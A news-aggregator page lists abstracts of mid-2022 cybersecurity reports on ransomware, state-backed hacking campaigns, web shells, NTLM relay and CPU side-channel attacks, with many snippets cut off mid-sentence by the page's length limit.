VoIP phones using Digium's software have been targeted to drop a web shell on their servers as part of an attack campaign designed to exfiltrate data by downloading and executing additional payloads. "The malware installs multilayer obfuscated PHP backdoors to the web server's file system, downloads new payloads for execution, and schedules recurring tasks to re-infect the host system," Palo Alto Networks Unit 42 said in a Friday report. The unusual activity is said to have commenced in mid-December 2021 and targets Asterisk, a widely used software implementation of a private branch exchange (PBX) that runs on the open-source Elastix Unified Communications Server. Unit 42 said the intrusions share similarities with the INJ3CTOR3 campaign that Israeli cybersecurity firm Check Point disclosed in November 2020, alluding to the possibility that they could be a "resurgence" of the previous attacks. Coinciding with the sudden surge is the public disclosThe Hacker News
July 15, 2022
New Cache Side Channel Attack Can De-Anonymize Targeted Online Users Full Text
Abstract
A group of academics from the New Jersey Institute of Technology (NJIT) has warned of a novel technique that could be used to defeat anonymity protections and identify a unique website visitor. "An attacker who has complete or partial control over a website can learn whether a specific target (i.e., a unique individual) is browsing the website," the researchers said. "The attacker knows this target only through a public identifier, such as an email address or a Twitter handle." The cache-based targeted de-anonymization attack is a cross-site leak that involves the adversary leveraging a service such as Google Drive, Dropbox, or YouTube to privately share a resource (e.g., image, video, or a YouTube playlist) with the target, followed by embedding the shared resource into the attack website. This can be achieved by, say, privately sharing the resource with the target using the victim's email address or the appropriate username associated with the servThe Hacker News
July 15, 2022
Attackers scan 1.6 million WordPress sites for vulnerable plugin Full Text
Abstract
Security researchers have detected a massive campaign that scanned close to 1.6 million WordPress sites for the presence of a vulnerable plugin that allows uploading files without authentication.BleepingComputer
July 15, 2022
North Korean Hackers Targeting Small and Midsize Businesses with H0lyGh0st Ransomware Full Text
Abstract
An emerging threat cluster originating from North Korea has been linked to developing and using ransomware in cyberattacks targeting small businesses since September 2021. The group, which calls itself H0lyGh0st after the ransomware payload of the same name, is being tracked by the Microsoft Threat Intelligence Center under the moniker DEV-0530, a designation assigned to an unknown, emerging, or developing group of threat activity. Targeted entities primarily include small-to-midsize businesses such as manufacturing organizations, banks, schools, and event and meeting planning companies. "Along with their H0lyGh0st payload, DEV-0530 maintains an .onion site that the group uses to interact with their victims," the researchers said in a Thursday analysis. "The group's standard methodology is to encrypt all files on the target device and use the file extension .h0lyenc, send the victim a sample of the files as proof, and then demand payment in Bitcoin in exchangeThe Hacker News
July 14, 2022
State-Backed Hackers Targeting Journalists in Widespread Espionage Campaigns Full Text
Abstract
Nation-state hacking groups aligned with China, Iran, North Korea, and Turkey have been targeting journalists to conduct espionage and spread malware as part of a series of campaigns since early 2021. "Most commonly, phishing attacks targeting journalists are used for espionage or to gain key insights into the inner workings of another government, company, or other area of state-designated import," Proofpoint said in a report shared with The Hacker News. The ultimate goal of the intrusions, the enterprise security firm said, is to gain a competitive intelligence edge or spread disinformation and propaganda. Proofpoint said it identified two Chinese hacking groups, TA412 (aka Zirconium or Judgment Panda) and TA459, targeting media personnel with malicious emails containing web beacons and weaponized documents respectively that were used to amass information about the recipients' network environments and drop Chinoxy malware. In a similar vein, the North KoreThe Hacker News
July 14, 2022
New Retbleed speculative execution CPU attack bypasses Retpoline fixes Full Text
Abstract
Security researchers have discovered a new speculative execution attack called Retbleed that affects processors from both Intel and AMD and could be used to extract sensitive information.BleepingComputer
July 14, 2022
Pakistani Hackers Targeting Indian Students in Latest Malware Campaign Full Text
Abstract
The advanced persistent threat (APT) group known as Transparent Tribe has been attributed to a new ongoing phishing campaign targeting students at various educational institutions in India at least since December 2021. "This new campaign also suggests that the APT is actively expanding its network of victims to include civilian users," Cisco Talos said in a report shared with The Hacker News. Also tracked under the monikers APT36, Operation C-Major, PROJECTM, Mythic Leopard, the Transparent Tribe actor is suspected to be of Pakistani origin and is known to strike government entities and think tanks in India and Afghanistan with custom malware such as CrimsonRAT, ObliqueRAT, and CapraRAT. But the targeting of educational institutions and students, first observed by India-based K7 Labs in May 2022, indicates a deviation from the adversary's typical focus. "The latest targeting of the educational sector may align with the strategic goals of espionage of theThe Hacker News
July 13, 2022
Bandai Namco confirms hack after ALPHV ransomware data leak threat Full Text
Abstract
Game publishing giant Bandai Namco has confirmed that they suffered a cyberattack that may have resulted in the theft of customers' personal data.BleepingComputer
July 12, 2022
The President of European Central Bank Christine Lagarde targeted by hackers Full Text
Abstract
Christine Lagarde, the president of the European Central Bank, was the target of a failed hacking attempt. The European Central Bank confirmed that its President, Christine Lagarde, was the target of a failed hacking attempt. The European Central...Security Affairs
July 11, 2022
India: CPWD faces cyber attacks, reiterates guidelines to employees Full Text
Abstract
The Central Public Works Department has been facing a spate of targeted cyberattacks on computers across its offices, according to an advisory it issued to employees last week, reiterating earlier cybersecurity guidelines.The Hindu
July 11, 2022
Associated Eye Care Discloses Impact From 2020 Netgain Ransomware Attack Full Text
Abstract
In November 2020, Netgain, a provider of managed IT services to several industries, fell victim to a ransomware attack that impacted numerous organizations in the healthcare sector, all of which were informed of the incident by January 2021.Security Week
July 10, 2022
Maastricht University wound up earning money from its ransom payment Full Text
Abstract
Maastricht University (UM), a Dutch university with more than 22,000 students, said last week that it has recovered the ransom paid after a ransomware attack that hit its network in December 2019.BleepingComputer
July 10, 2022
French telephone operator La Poste Mobile suffered a ransomware attack Full Text
Abstract
French virtual mobile telephone operator La Poste Mobile was hit by a ransomware attack that impacted administrative and management services. The ransomware attack hit the virtual mobile telephone operator La Poste Mobile on July 4 and paralyzed...Security Affairs
July 9, 2022
Ongoing Raspberry Robin campaign leverages compromised QNAP devices Full Text
Abstract
Cybereason researchers are warning of a wave of attacks spreading the wormable Windows malware Raspberry Robin. Raspberry Robin is a Windows worm discovered by cybersecurity researchers from Red Canary, the malware propagates through removable USB devices. The...Security Affairs
July 8, 2022
U.S. Healthcare Orgs Targeted with Maui Ransomware Full Text
Abstract
State-sponsored actors are deploying the unique malware–which targets specific files and leaves no ransomware note–in ongoing attacks.Threatpost
July 8, 2022
IconBurst Supply Chain Attacks Steal Data Via Malicious NPM Packages Full Text
Abstract
An NPM supply-chain attack campaign, dubbed IconBurst, has been seen leveraging several malicious NPM modules to infect hundreds of systems. Researchers have observed similarities between the domains used to exfiltrate information implying that the different modules used in this campaign are contro ... Read MoreCyware Alerts - Hacker News
July 07, 2022
TrickBot Gang Shifted its Focus on “Systematically” Targeting Ukraine Full Text
Abstract
In what's being described as an "unprecedented" twist, the operators of the TrickBot malware have resorted to systematically targeting Ukraine since the onset of the war in late February 2022. The group is believed to have orchestrated at least six phishing campaigns aimed at targets that align with Russian state interests, with the emails acting as lures for delivering malicious software such as IcedID, CobaltStrike, AnchorMail, and Meterpreter. Tracked under the names ITG23, Gold Blackburn, and Wizard Spider, the financially motivated cybercrime gang is known for its development of the TrickBot banking trojan and was subsumed into the now-discontinued Conti ransomware cartel earlier this year. But merely weeks later, the actors associated with the group resurfaced with a revamped version of the AnchorDNS backdoor called AnchorMail that uses SMTPS and IMAP protocols for command-and-control communications. "ITG23's campaigns against Ukraine arThe Hacker News
July 07, 2022
North Korean Maui Ransomware Actively Targeting U.S. Healthcare Organizations Full Text
Abstract
In a new joint cybersecurity advisory, U.S. cybersecurity and intelligence agencies have warned about the use of Maui ransomware by North Korean government-backed hackers to target the healthcare sector since at least May 2021. "North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services," the authorities noted. The alert comes courtesy of the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of the Treasury. Cybersecurity firm Stairwell, whose findings formed the basis of the advisory, said the lesser-known ransomware family stands out because of a lack of several key features commonly associated with ransomware-as-a-service (RaaS) groups. This includes the absence of "embedded ransom note to provide recovThe Hacker News
July 07, 2022
Quantum ransomware attack affects 657 healthcare orgs Full Text
Abstract
Professional Finance Company Inc. (PFC), a full-service accounts receivables management company, says that a ransomware attack in late February led to a data breach affecting over 600 healthcare organizations.BleepingComputer
July 07, 2022
QNAP warns of new Checkmate ransomware targeting NAS devices Full Text
Abstract
Taiwan-based network-attached storage (NAS) vendor QNAP warned customers to secure their devices against attacks using Checkmate ransomware to encrypt data.BleepingComputer
July 06, 2022
IT services giant SHI hit by “professional malware attack” Full Text
Abstract
SHI International Corp, a New Jersey-based provider of Information Technology (IT) products and services, has confirmed that its network was hit by a malware attack over the weekend.BleepingComputer
July 06, 2022
Hackers Abusing BRc4 Red Team Penetration Tool in Attacks to Evade Detection Full Text
Abstract
Malicious actors have been observed abusing legitimate adversary simulation software in their attacks in an attempt to stay under the radar and evade detection. Palo Alto Networks Unit 42 said a malware sample uploaded to the VirusTotal database on May 19, 2022, contained a payload associated with Brute Ratel C4, a relatively new sophisticated toolkit "designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities." Authored by an Indian security researcher named Chetan Nayak, Brute Ratel (BRc4) is analogous to Cobalt Strike and is described as a "customized command-and-control center for red team and adversary simulation." The commercial software was first released in late 2020 and has since gained over 480 licenses across 350 customers. Each license is offered at $2,500 per user for a year, after which it can be renewed for the same duration at the cost of $2,250. BRc4 is equipped with a wide variety of features,The Hacker News
July 6, 2022
Less popular, but very effective, Red-Teaming Tool BRc4 used in attacks in the wild Full Text
Abstract
Threat actors are abusing legitimate adversary simulation software BRc4 in their campaigns to evade detection. Researchers from Palo Alto Networks Unit 42 discovered that a sample uploaded to the VirusTotal database on May 19, 2022 and considered...Security Affairs
July 06, 2022
US govt warns of Maui ransomware attacks against healthcare orgs Full Text
Abstract
The FBI, CISA, and the U.S. Treasury Department issued today a joint advisory warning of North-Korean-backed threat actors using Maui ransomware in attacks against Healthcare and Public Health (HPH) organizations.BleepingComputer
July 6, 2022
Solana DeFi Protocol Crema Finance Loses $8.8 Million in Flash Loan Attack Full Text
Abstract
Solana-based liquidity protocol Crema Finance had more than $8.78 million worth of cryptocurrencies stolen from its platform in an attack over the weekend, developers said in a tweet.Yahoo Finance
July 5, 2022
Iranian Fars News Agency claims cyberattack on a company involved in the construction of Tel Aviv metro Full Text
Abstract
Iran’s Fars News Agency reported that a massive cyberattack hit operating systems and servers of the Tel Aviv Metro. Iran’s Fars News Agency reported on Monday that operating systems and servers of the Tel Aviv Metro were hit by a massive cyberattack....Security Affairs
July 05, 2022
NPM supply-chain attack impacts hundreds of websites and apps Full Text
Abstract
An NPM supply-chain attack dating back to December 2021 used dozens of malicious NPM modules containing obfuscated Javascript code to compromise hundreds of downstream desktop apps and websites.BleepingComputer
July 05, 2022
Pro-China Group Uses Dragonbridge Campaign to Target Rare Earth Mining Companies Full Text
Abstract
A pro-China influence campaign singled out rare earth mining companies in Australia, Canada, and the U.S. with negative messaging in an unsuccessful attempt to manipulate public discourse to China's benefit. Targeted firms included Australia's Lynas Rare Earths Ltd, Canada's Appia Rare Earths & Uranium Corp, and the American company USA Rare Earth, threat intelligence firm Mandiant said in a report last week, calling the digital campaign Dragonbridge. "It targeted an industry of strategic significance to the PRC, including specifically three commercial entities challenging the PRC's global market dominance in that industry," Mandiant noted. The goal, the company noted, was to instigate environmental protests against the companies and propagate counter-narratives in response to potential or planned rare earths production activities involving the targets. This comprised a network of thousands of inauthentic accounts across numerous social mediThe Hacker News
July 5, 2022
8220 Gang Exploiting Vulnerabilities in WebLogic and Atlassian Servers - Warns Microsoft Full Text
Abstract
The recent campaign targets i686 and x86_64 Linux systems. It employs RCE exploits for CVE-2019-2725 (WebLogic) and CVE-2022-26134 (Atlassian Confluence Server and Data Center) for initial access.Cyware Alerts - Hacker News
July 5, 2022
Attackers Targeting Microsoft Exchange Server Via SessionManager Backdoor Full Text
Abstract
Researchers from Kaspersky have named the backdoor SessionManager; the threat was first spotted in early 2022. It is a native-code module for Microsoft's IIS web server software.Cyware Alerts - Hacker News
July 2, 2022
Russian hackers allegedly target Ukraine’s biggest private energy firm Full Text
Abstract
Russian hackers carried out a "cyberattack" on Ukraine's biggest private energy conglomerate, the DTEK Group, in retaliation for its owner's opposition to Russia's war in Ukraine.CNN Money
June 30, 2022
Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers Full Text
Abstract
A cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign. "The updates include the deployment of new versions of a crypto miner and an IRC bot," Microsoft Security Intelligence said in a series of tweets on Thursday. "The group has actively updated its techniques and payloads over the last year." 8220, active since early 2017, is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220. It's also the developer of a tool called whatMiner, which has been co-opted by the Rocke cybercrime group in their attacks. In July 2019, the Alibaba Cloud Security Team uncovered an extra shift in the adversary's tactics, noting its use of rootkits to hide the mining program. Two years later, the gang resurfaced with Tsunami IRC botnet variants and a custom "The Hacker News
June 30, 2022
Norway Hit by Disruptive Cyberattack, Pro-Russian Hacker Group Suspected to be the Culprit Full Text
Abstract
Wednesday’s cyberattack on Norway came two days after a similar attack temporarily knocked out public and private websites in Lithuania with a pro-Moscow hacker group reportedly claiming responsibility.CNBC
June 29, 2022
Walmart denies being hit by Yanluowang ransomware attack Full Text
Abstract
American retailer Walmart has denied being hit with a ransomware attack by the Yanluowang gang after the hackers claimed to encrypt thousands of computers.BleepingComputer
June 29, 2022
Chinese Threat Actor Targets Rare Earth Mining Companies in North America, Australia Full Text
Abstract
Mandiant’s security researchers have been tracking influence campaigns that a Chinese threat actor named Dragonbridge has been conducting against rare earth mining companies in Australia, Canada, and the United States.Security Week
June 28, 2022
New Attack Method Devised to Abuse Microsoft WebView2 and Bypass MFA Full Text
Abstract
A new phishing attack could abuse Microsoft Edge WebView2 applications to steal victims’ authentication cookies, which attackers can then use to bypass MFA and log into accounts. The attack includes a WebView2 executable, for which the researcher created a proof-of-concept that opens a genuine Microsoft login f ... Read MoreCyware Alerts - Hacker News
June 28, 2022
AMD investigates RansomHouse hack claims, theft of 450GB data Full Text
Abstract
Chip manufacturer AMD says they are investigating a cyberattack after threat actors claimed to have stolen 450 GB of data from the company last year.BleepingComputer
June 28, 2022
Tencent admits to poisoned QR code attack on QQ accounts Full Text
Abstract
The problem manifested on Sunday night and saw an unnamed number of QQ users complain their credentials no longer allowed them access to their accounts. Tencent has characterized that issue as representing "stolen" accounts.The Register
June 27, 2022
The government of Lithuania confirmed it had been hit by an intense cyberattack Full Text
Abstract
Lithuania confirmed it had been hit by an "intense" cyberattack, after Vilnius imposed restrictions on the rail transit of certain goods to Kaliningrad. The government of Lithuania announced on Monday that it had been hit by an "intense" cyberattack,...Security Affairs
June 27, 2022
New Matanbuchus Campaign drops Cobalt Strike beacons Full Text
Abstract
Matanbuchus malware-as-a-service (MaaS) has been observed spreading through phishing campaigns, dropping Cobalt Strike beacons. Threat intelligence firm Cyble has observed a malware-as-a-service (MaaS), named Matanbuchus, involved in malspam...Security Affairs
June 27, 2022
Vice Society claims ransomware attack on Med. University of Innsbruck Full Text
Abstract
The Vice Society ransomware gang has claimed responsibility for last week's cyberattack against the Medical University of Innsbruck, which caused severe IT service disruption and the alleged theft of data.BleepingComputer
June 26, 2022
Russia-linked actors may be behind an explosion at a liquefied natural gas plant in Texas Full Text
Abstract
Russian threat actors may be behind the explosion at a liquefied natural gas plant in Texas; the incident took place on June 8. A Russian hacking group may be responsible for a cyber attack against a liquefied natural gas plant in Texas that led to its explosion...Security Affairs
June 25, 2022
Automotive fabric supplier TB Kawashima announces cyberattack Full Text
Abstract
TB Kawashima, part of the Japanese automotive component manufacturer Toyota Boshoku of the Toyota Group of companies, announced that one of its subsidiaries has been hit by a cyberattack.BleepingComputer
June 24, 2022
Hackers Exploit Mitel VoIP Zero-Day in Likely Ransomware Attack Full Text
Abstract
A suspected ransomware intrusion against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment. The findings come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown exploit as well as a couple of anti-forensic measures adopted by the actor on the device to erase traces of their actions. The exploit in question is tracked as CVE-2022-29499 and was fixed by Mitel in April 2022. It's rated 9.8 out of 10 for severity on the CVSS vulnerability scoring system, making it a critical shortcoming. "A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the contextThe Hacker News
June 24, 2022
Fast Shop Brazilian retailer discloses “extortion” cyberattack Full Text
Abstract
Fast Shop, one of Brazil's largest retailers, has suffered an 'extortion' cyberattack that led to network disruption and the temporary closure of its online store.BleepingComputer
June 23, 2022
Malicious Windows ‘LNK’ attacks made easy with new Quantum builder Full Text
Abstract
Malware researchers have noticed a new tool that helps cybercriminals build malicious .LNK files to deliver payloads for the initial stages of an attack.BleepingComputer
June 23, 2022
Automotive hose maker Nichirin hit by ransomware attack Full Text
Abstract
Nichirin-Flex U.S.A, a subsidiary of the Japanese car and motorcycle hose maker Nichirin, has been hit by a ransomware attack causing the company to take the network offline.BleepingComputer
June 22, 2022
Exclusive: Lithuania under cyber-attack after the ban on Russian railway goods Full Text
Abstract
Cyber Spetsnaz is targeting government resources and critical infrastructure in Lithuania after the ban of Russian railway goods. Cyber Spetsnaz is targeting Lithuanian government resources and critical infrastructure – the recent ban on Russian...Security Affairs
June 22, 2022
Chinese hackers target script kiddies with info-stealer trojan Full Text
Abstract
Cybersecurity researchers have discovered a new campaign attributed to the Chinese "Tropic Trooper" hacking group, which employs a novel loader called Nimbda and a new variant of the Yahoyah trojan.BleepingComputer
June 22, 2022
Russian Hackers Exploiting Microsoft Follina Vulnerability Against Ukraine Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has cautioned of a new set of spear-phishing attacks exploiting the "Follina" flaw in the Windows operating system to deploy password-stealing malware. Attributing the intrusions to a Russian nation-state group tracked as APT28 (aka Fancy Bear or Sofacy), the agency said the attacks commence with a lure document titled "Nuclear Terrorism A Very Real Threat.rtf" that, when opened, exploits the recently disclosed vulnerability to download and execute a malware called CredoMap. Follina (CVE-2022-30190, CVSS score: 7.8), which concerns a case of remote code execution affecting the Windows Support Diagnostic Tool (MSDT), was addressed by Microsoft on June 14, 2022, as part of its Patch Tuesday updates. According to an independent report published by Malwarebytes, CredoMap is a variant of the .NET-based credential stealer that Google Threat Analysis Group (TAG) divulged last month as having been deplThe Hacker News
June 22, 2022
Magecart attacks are still around but are more difficult to detect Full Text
Abstract
Researchers from Malwarebytes warn that the Magecart skimming campaign is active, but the attacks are more covert. Magecart threat actors have switched most of their operations server-side to avoid detection by security firms. However, Malwarebytes...Security Affairs
June 22, 2022
Microsoft: Russia stepped up cyberattacks against Ukraine’s allies Full Text
Abstract
Microsoft said today that Russian intelligence agencies have stepped up cyberattacks against governments of countries that have allied themselves with Ukraine after Russia's invasion.BleepingComputer
June 22, 2022
DFSCoerce: A New NTLM Relay Attack for Complete Account Takeover Full Text
Abstract
A new DFSCoerce Windows NTLM relay attack uses MS-DFSNM to entirely take over a Windows domain. The script used is based on the PetitPotam exploit. For this attack, researchers abused the Microsoft Active Directory Certificate Services, which is exposed to NTLM relay attacks. The best way to stop s ... Read MoreCyware Alerts - Hacker News
June 21, 2022
VIP3R Campaign Uses HTML Attachments to Bypass Email Security Full Text
Abstract
Researchers have observed new spear-phishing campaigns, dubbed VIP3R, aimed at certain organizations and individuals via infected HTML attachments. If opened, victims are directed to a phishing page impersonating a service often used by them, where they are urged to input their username and pas ... Read MoreCyware Alerts - Hacker News
June 21, 2022
New DFSCoerce NTLM relay attack allows taking control over Windows domains Full Text
Abstract
Experts discovered a new kind of Windows NTLM relay attack dubbed DFSCoerce that allows taking control over a Windows domain. Researchers warn of a new Windows NTLM relay attack dubbed DFSCoerce that can be exploited by threat actors to take control...Security Affairs
June 21, 2022
Russian govt hackers hit Ukraine with Cobalt Strike, CredoMap malware Full Text
Abstract
The Ukrainian Computer Emergency Response Team (CERT) is warning that Russian hacking groups are exploiting the Follina code execution vulnerability in new phishing campaigns to install the CredoMap malware and Cobalt Strike beacons.BleepingComputer
June 21, 2022
New NTLM Relay Attack Lets Attackers Take Control Over Windows Domain Full Text
Abstract
A new kind of Windows NTLM relay attack dubbed DFSCoerce has been uncovered that leverages the Distributed File System (DFS): Namespace Management Protocol (MS-DFSNM) to seize control of a domain. "Spooler service disabled, RPC filters installed to prevent PetitPotam and File Server VSS Agent Service not installed but you still want to relay [Domain Controller authentication to [Active Directory Certificate Services]? Don't worry MS-DFSNM have (sic) your back," security researcher Filip Dragovic said in a tweet. MS-DFSNM provides a remote procedure call (RPC) interface for administering distributed file system configurations. The NTLM (NT Lan Manager) relay attack is a well-known method that exploits the challenge-response mechanism. It allows malicious parties to sit between clients and servers and intercept and relay validated authentication requests in order to gain unauthorized access to network resources, effectively gaining an initial foothold in Active DiThe Hacker News
June 21, 2022
Microsoft Exchange servers hacked by new ToddyCat APT gang Full Text
Abstract
An advanced persistent threat (APT) group dubbed ToddyCat has been targeting Microsoft Exchange servers throughout Asia and Europe for more than a year, since at least December 2020.BleepingComputer
June 21, 2022
Client-side Magecart attacks still around, but more covert Full Text
Abstract
For now, researchers say that Magecart client-side attacks are still around and that we could easily be missing them if we rely on automated crawlers and sandboxes, at least if we don’t make them more robust.Malwarebytes Labs
June 20, 2022
New DFSCoerce NTLM Relay attack allows Windows domain takeover Full Text
Abstract
A new Windows NTLM relay attack called DFSCoerce has been discovered that uses MS-DFSNM, Microsoft's Distributed File System, to completely take over a Windows domain.BleepingComputer
June 20, 2022
Microsoft 365 credentials targeted in new fake voicemail campaign Full Text
Abstract
A new phishing campaign has been targeting U.S. organizations in the military, security software, manufacturing supply chain, healthcare and pharmaceutical sectors to steal Microsoft Office 365 and Outlook credentials.BleepingComputer
June 19, 2022
Experts warn of a new eCh0raix ransomware campaign targeting QNAP NAS Full Text
Abstract
Experts warn of a new ech0raix ransomware campaign targeting QNAP Network Attached Storage (NAS) devices. Bleeping Computer and MalwareHunterTeam researchers, citing user reports and sample submissions on the ID Ransomware platform, warn...Security Affairs
June 19, 2022
Chinese Hackers Abuse Zero-day Bug in Sophos Firewall Full Text
Abstract
Volexity researchers laid bare a sophisticated campaign by a Chinese APT abusing a critical zero-day in Sophos’ firewall product. Sophos has fixed the flaw and provided mitigations to help organizations use their firewall and protect against threat actors abusing the vulnerability.Cyware Alerts - Hacker News
June 18, 2022
QNAP NAS devices targeted by surge of eCh0raix ransomware attacks Full Text
Abstract
This week a new series of ech0raix ransomware attacks has started targeting vulnerable QNAP Network Attached Storage (NAS) devices, according to user reports and sample submissions on the ID-Ransomware platform.BleepingComputer
June 18, 2022
MaliBot Android Banking Trojan targets Spain and Italy Full Text
Abstract
Malibot is a new Android malware targeting online banking and cryptocurrency wallet customers in Spain and Italy. F5 Labs researchers spotted a new strain of Android malware, named Malibot, that is targeting online banking and cryptocurrency wallet...Security Affairs
June 17, 2022
Robert Half Discloses Hacking Attack Impacting Over 1,000 Customer Accounts Full Text
Abstract
Information provided by the company to the Maine Attorney General shows that threat actors targeted Robert Half between April 26 and May 16. The incident, discovered on May 31, impacts 1,058 individuals.Security Week
June 17, 2022
Chinese Hackers Exploited Sophos Firewall Zero-Day Flaw to Target South Asian Entity Full Text
Abstract
A sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack. "The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks against the customer's staff," Volexity said in a report. "These attacks aimed to further breach cloud-hosted web servers hosting the organization's public-facing websites." The zero-day flaw in question is tracked as CVE-2022-1040 (CVSS score: 9.8), and concerns an authentication bypass vulnerability that can be weaponized to execute arbitrary code remotely. It affects Sophos Firewall versions 18.5 MR3 (18.5.3) and earlier. The cybersecurity firm, which issued a patch for the flaw on March 25, 2022, noted that it was abused to "target a small set of specThe Hacker News
June 17, 2022
QNAP ‘thoroughly investigating’ new DeadBolt ransomware attacks Full Text
Abstract
Network-attached storage (NAS) vendor QNAP once again warned customers on Friday to secure their devices against a new campaign of attacks pushing DeadBolt ransomware.BleepingComputer
June 17, 2022
MaliBot Banking Trojan Targets Android Users in Italy and Spain Full Text
Abstract
F5 Labs discovered new Android-based information-stealing malware, dubbed MaliBot. It was spotted targeting online banking and cryptocurrency wallet users in Italy and Spain. Some of the banks targeted by MaliBot using this approach include UniCredit, Santander, CaixaBank, and CartaBCC. Due to the ... Read MoreCyware Alerts - Hacker News
June 16, 2022
BlackCat Ransomware affiliates target unpatched Microsoft Exchange servers Full Text
Abstract
The BlackCat ransomware gang is targeting unpatched Exchange servers to compromise target networks, Microsoft warns. Microsoft researchers have observed BlackCat ransomware gang targeting unpatched Exchange servers to compromise organizations...Security Affairs
June 15, 2022
Hackers exploit three-year-old Telerik flaws to deploy Cobalt Strike Full Text
Abstract
The threat actor known as 'Blue Mockingbird' has been observed by analysts targeting Telerik UI vulnerabilities to compromise servers, install Cobalt Strike beacons, and mine Monero by hijacking system resources.BleepingComputer
June 15, 2022
Iranian Hacking Campaign that Included Former U.S. Ambassador Full Text
Abstract
Alleged Iranian hackers were found targeting former Israeli officials, a former U.S. ambassador, the head of a security think tank, and high-ranking military personnel via spearphishing attacks. Reports in Israel also speculate that the campaign could be the work of Phosphorus, a prolific Iranian g ... Read MoreCyware Alerts - Hacker News
June 15, 2022
Extortion gang ransoms Shoprite, largest supermarket chain in Africa Full Text
Abstract
Shoprite Holdings, Africa's largest supermarket chain that operates almost three thousand stores across twelve countries in the continent, has been hit by a ransomware attack.BleepingComputer
June 14, 2022
New Hertzbleed side-channel attack affects Intel, AMD CPUs Full Text
Abstract
A new side-channel attack known as Hertzbleed allows remote attackers to steal full cryptographic keys by observing variations in CPU frequency enabled by dynamic voltage and frequency scaling (DVFS).BleepingComputer
June 14, 2022
Conti’s Attack Against Costa Rica Sparks a New Ransomware Era Full Text
Abstract
Conti claimed responsibility for the first attack against Costa Rica’s government and is believed to have some links to the ransomware-as-a-service operation HIVE, which was responsible for the second attack impacting the country's healthcare system.Wired
June 14, 2022
SeaFlower campaign distributes backdoored versions of Web3 wallets to steal seed phrases Full Text
Abstract
Chinese cybercriminals are using backdoored versions of iOS and Android Web3 wallets, tracked as SeaFlower, to steal users' seed phrases. Researchers from Confiant have uncovered a sophisticated malware campaign, tracked as SeaFlower, targeting Web3 wallet users....Security Affairs
June 14, 2022
PACMAN Attack Targets Apple M1 Chip Embedded CPUs Full Text
Abstract
Researchers devised a new hardware attack aimed at Pointer Authentication in Apple M1 CPUs that may allow an attacker to run arbitrary code on Mac systems. PACMAN is an exploitation technique rather than a standalone vulnerability: it cannot compromise a system on its own and needs an existing memory-corruption bug to build on. Apple has claimed that the issue does not ... Read MoreCyware Alerts - Hacker News
June 13, 2022
Gallium hackers backdoor finance, govt orgs using new PingPull malware Full Text
Abstract
The Gallium state-sponsored hacking group has been spotted using a new 'PingPull' remote access trojan against financial institutions and government entities in Europe, Southeast Asia, and Africa.BleepingComputer
June 13, 2022
Chinese ‘Gallium’ Hackers Using New PingPull Malware in Cyberespionage Attacks Full Text
Abstract
A Chinese advanced persistent threat (APT) known as Gallium has been observed using a previously undocumented remote access trojan in its espionage attacks targeting companies operating in Southeast Asia, Europe, and Africa. Called PingPull, the "difficult-to-detect" backdoor is notable for its use of the Internet Control Message Protocol (ICMP) for command-and-control (C2) communications, according to new research published by Palo Alto Networks Unit 42 today. Gallium is known for its attacks primarily aimed at telecom companies dating as far back as 2012. Also tracked under the name Soft Cell by Cybereason, the state-sponsored actor has been connected to a broader set of attacks targeting five major telecom companies located in Southeast Asian countries since 2017. Over the past year, however, the group is said to have expanded its victimology footprint to include financial institutions and government entities located in Afghanistan, Australia, Belgium, CambodiThe Hacker News
June 13, 2022
HelloXD Ransomware operators install MicroBackdoor on target systems Full Text
Abstract
Experts observed the HelloXD ransomware deploying a backdoor to maintain persistent remote access to infected hosts. The HelloXD ransomware first appeared in the threat landscape on November 30, 2021; it borrows code from the Babuk ransomware,...Security Affairs
June 13, 2022
Microsoft: Exchange servers hacked to deploy BlackCat ransomware Full Text
Abstract
Microsoft says BlackCat ransomware affiliates are now attacking Microsoft Exchange servers using exploits targeting unpatched vulnerabilities.BleepingComputer
June 13, 2022
Russian hackers start targeting Ukraine with Follina exploits Full Text
Abstract
Ukraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190.BleepingComputer
June 12, 2022
Iranian Hackers Spotted Using a new DNS Hijacking Malware in Recent Attacks Full Text
Abstract
The Iranian state-sponsored threat actor tracked under the moniker Lyceum has turned to using a new custom .NET-based backdoor in recent campaigns directed against the Middle East. "The new malware is a .NET based DNS Backdoor which is a customized version of the open source tool 'DIG.net,'" Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a report published last week. "The malware leverages a DNS attack technique called 'DNS Hijacking' in which an attacker-controlled DNS server manipulates the response of DNS queries and resolves them as per their malicious requirements." DNS hijacking is a redirection attack in which DNS queries to genuine websites are intercepted to take an unsuspecting user to fraudulent pages under an adversary's control. Unlike cache poisoning, DNS hijacking targets the DNS record of the website on the nameserver, rather than a resolver's cache. Lyceum, also known as Hexane, SpirliThe Hacker News
June 11, 2022
Confluence servers hacked to deploy AvosLocker, Cerber2021 ransomware Full Text
Abstract
Ransomware gangs are now targeting a recently patched and actively exploited remote code execution (RCE) vulnerability affecting Atlassian Confluence Server and Data Center instances for initial access to corporate networks.BleepingComputer
June 11, 2022
PACMAN, a new attack technique against Apple M1 CPUs Full Text
Abstract
